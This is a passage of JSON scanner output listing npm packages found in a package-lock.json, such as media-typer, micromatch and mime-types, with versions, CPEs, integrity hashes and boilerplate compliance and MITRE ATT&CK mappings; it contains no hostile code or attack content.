"techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "9efbed3ea63ec0cc", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: media-engine 1.0.3", "title": "media-engine 1.0.3", "description": "Package discovered: media-engine 1.0.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "1dbf081258d17462", "name": "media-engine", "version": "1.0.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:media-engine:media-engine:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:media-engine:media_engine:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:media_engine:media-engine:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:media_engine:media_engine:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:media:media-engine:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:media:media_engine:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/media-engine@1.0.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/media-engine/-/media-engine-1.0.3.tgz", "integrity": "sha512-aa5tG6sDoK+k70B9iEX1NeyfT8ObCKhNDs6lJVpwF6r8vhUfuKMslIcirq6HIUYuuUYLefcEQOn9bSBOvawtwg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "6ecc4376357a6aa5", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: media-typer 0.3.0", "title": "media-typer 0.3.0", "description": "Package discovered: media-typer 0.3.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "d88fe6586764efc9", "name": "media-typer", "version": "0.3.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:media-typer:media-typer:0.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:media-typer:media_typer:0.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:media_typer:media-typer:0.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:media_typer:media_typer:0.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:media:media-typer:0.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:media:media_typer:0.3.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/media-typer@0.3.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/media-typer/-/media-typer-0.3.0.tgz", "integrity": "sha512-dq+qelQ9akHpcOl/gUVRTxVIOkAJ1wR3QAvb4RsVjS8oVoFjDGTc679wJYmUmknUF5HwMLOgb5O+a3KxfWapPQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d32acd7a2e9bf402", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: merge-descriptors 1.0.3", "title": "merge-descriptors 1.0.3", "description": "Package discovered: merge-descriptors 1.0.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "670d71ff9d8ed75e", "name": "merge-descriptors", "version": "1.0.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:merge-descriptors:merge-descriptors:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:merge-descriptors:merge_descriptors:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:merge_descriptors:merge-descriptors:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:merge_descriptors:merge_descriptors:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:merge:merge-descriptors:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:merge:merge_descriptors:1.0.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/merge-descriptors@1.0.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/merge-descriptors/-/merge-descriptors-1.0.3.tgz", "integrity": "sha512-gaNvAS7TZ897/rVaZ0nMtAyxNyi/pdbjbAwUpFQpN70GqnVfOiXpeUUMKRBmzXaSQ8DdTX4/0ms62r2K+hE6mQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "b81185034826e168", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: merge2 1.4.1", "title": "merge2 1.4.1", "description": "Package discovered: merge2 1.4.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "49cc3c07a1505404", "name": "merge2", "version": "1.4.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:merge2:merge2:1.4.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/merge2@1.4.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/merge2/-/merge2-1.4.1.tgz", "integrity": "sha512-8q7VEgMJW4J8tcfVPy8g09NcQwZdbwFEqhe/WZkoIzjn/3TGDwtOCYtXGxA3O8tPzpczCCDgv+P2P5y00ZJOOg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "b23a5664e0d696ec", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: methods 1.1.2", "title": "methods 1.1.2", "description": "Package discovered: methods 1.1.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "a17abee1ae67ac79", "name": "methods", "version": "1.1.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:methods:methods:1.1.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/methods@1.1.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/methods/-/methods-1.1.2.tgz", "integrity": "sha512-iclAHeNqNm68zFtnZ0e+1L2yUIdvzNoauKU4WBA3VvH/vPFieF7qfRlwUZU+DA9P9bPXIS90ulxoUoCH23sV2w==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "e5492a26182452ae", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: micromatch 4.0.8", "title": "micromatch 4.0.8", "description": "Package discovered: micromatch 4.0.8", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "dc31731ddf283ca7", "name": "micromatch", "version": "4.0.8", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:jonschlinkert:micromatch:4.0.8:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/micromatch@4.0.8", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz", "integrity": "sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==", "dependencies": { "braces": "^3.0.3", "picomatch": "^2.3.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "cdd82acabfa8e9e8", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: mime 1.6.0", "title": "mime 1.6.0", "description": "Package discovered: mime 1.6.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "10b23cab35239c6d", "name": "mime", "version": "1.6.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:mime_project:mime:1.6.0:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/mime@1.6.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/mime/-/mime-1.6.0.tgz", "integrity": "sha512-x0Vn8spI+wuJ1O6S7gnbaQg8Pxh4NNHb7KSINmEWKiPE4RKOplvijn+NkmYmmRgP68mc70j2EbeTFRsrswaQeg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "a724fe9397f99c40", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: mime 3.0.0", "title": "mime 3.0.0", "description": "Package discovered: mime 3.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "438a12c55a1c15bf", "name": "mime", "version": "3.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:mime_project:mime:3.0.0:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/mime@3.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/mime/-/mime-3.0.0.tgz", "integrity": "sha512-jSCU7/VB1loIWBZe14aEYHU/+1UMEHoaO7qxCOVJOw9GgH72VAWppxNcjU+x9a2k3GSIBXNKxXQFqRvvZ7vr3A==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "1454de8382f97ba2", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: mime-db 1.52.0", "title": "mime-db 1.52.0", "description": "Package discovered: mime-db 1.52.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "e010d1b3c9ab0c02", "name": "mime-db", "version": "1.52.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:mime-db:mime-db:1.52.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:mime-db:mime_db:1.52.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:mime_db:mime-db:1.52.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:mime_db:mime_db:1.52.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:mime:mime-db:1.52.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:mime:mime_db:1.52.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/mime-db@1.52.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "c62c037f2c05a588", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: mime-types 2.1.35", "title": "mime-types 2.1.35", "description": "Package discovered: mime-types 2.1.35", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "d035c2d2cba76761", "name": "mime-types", "version": "2.1.35", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:mime-types:mime-types:2.1.35:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:mime-types:mime_types:2.1.35:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:mime_types:mime-types:2.1.35:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:mime_types:mime_types:2.1.35:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:mime:mime-types:2.1.35:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:mime:mime_types:2.1.35:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/mime-types@2.1.35", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", "integrity": 